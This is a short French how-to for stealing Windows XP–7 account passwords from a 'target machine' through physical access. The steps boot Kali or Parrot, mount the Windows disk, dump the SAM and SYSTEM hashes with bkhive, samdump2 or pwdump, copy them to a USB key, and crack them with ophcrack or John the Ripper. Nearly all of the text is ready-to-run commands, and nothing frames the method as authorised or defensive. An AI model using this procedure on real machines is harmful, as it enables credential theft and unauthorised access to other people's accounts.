une méthode pour récupérer les mdp Windows xp-vista-7

Prérequis:

  1. accès physique a la machine cible
  2. pouvoir démarrer un système alternatif comme kali ou parrot

Main

une fois le système lancé, il faut monter le disque système avec une commande du genre:

mkdir /media/win
mount /dev/sda2 /media/win

On ce rend dans le dossier système qui contient les fichier SAM et SYSTEM

 cd /media/win/Windows/System32/config/

Puis on utilise les programmes suivant pour extraire les hash des comptes:

 bkhive SYSTEM ~/Desktop/hive.txt
 samdump2 SAM ~/Desktop/hive.txt > ~/Desktop/hash.txt
Le programme pwdump peux remplacer bkhive & samdump2 usage: pwdump SAM SYSTEM > hash.txt

Check le contenu du fichier hash.txt et copie sur la clef usb

 less ~/Desktop/hash.txt 
 cp ~/Desktop/hash.txt /media/CLEF/

Crack

Plusieurs possibilité :

  1. utiliser des raindowtables dans un premier temps c.f ophcrack
  2. john the rippeur pourra par la suite appliquer des wordlists ou faire un brut fort classique
Pour tester rapidement la solidité d'un mot de passe:
mkpasswd -m MD5 mon_password > hash.txt && john hash.txt

MD5 est donné a titre d'exemple